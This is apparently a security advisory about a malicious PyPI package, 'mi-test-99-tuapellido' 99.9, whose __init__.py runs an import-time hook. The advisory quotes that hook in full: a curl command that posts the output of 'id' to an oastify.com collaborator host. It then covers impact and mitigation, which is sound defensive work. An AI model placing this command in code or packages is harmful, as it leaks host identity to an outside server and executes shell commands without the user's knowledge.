The 'mi-test-99-tuapellido' PyPI package (version 99.9) contains a top-level __init__.py that executes 'os.system("curl http://6krddfbeqw0pisps3egdsofu9lfc33vrk.oastify.com -d $(id)")' on import. This command sends the current user's identity information to a Burp Suite Collaborator-like service, confirming remote code execution and data exfiltration. The package metadata is placeholder text, indicating it is likely a test or proof-of-concept malicious package designed for dependency confusion or namespace squatting attacks. The package has no legitimate functionality and is flagged as malicious by OpenSSF Package Analysis and other sources.

Importing or installing this package results in arbitrary shell command execution on the host system, specifically leaking user and group identity information to an attacker-controlled server over plaintext HTTP. This compromises confidentiality of host identity information and demonstrates an arbitrary code execution vector. Although the exfiltrated data is limited to basic host identity, the presence of arbitrary shell execution indicates a potentially serious security risk if used in a real attack scenario.

No official patch or remediation is available for this package. The best mitigation is to avoid installing or importing 'mi-test-99-tuapellido' version 99.9. Users should verify package authenticity before installation and avoid packages with placeholder metadata or suspicious behavior. Since this is a malicious package on PyPI, removing it from the environment and blocking its installation is recommended. Monitor package sources and use dependency allowlists or trusted registries to prevent accidental installation.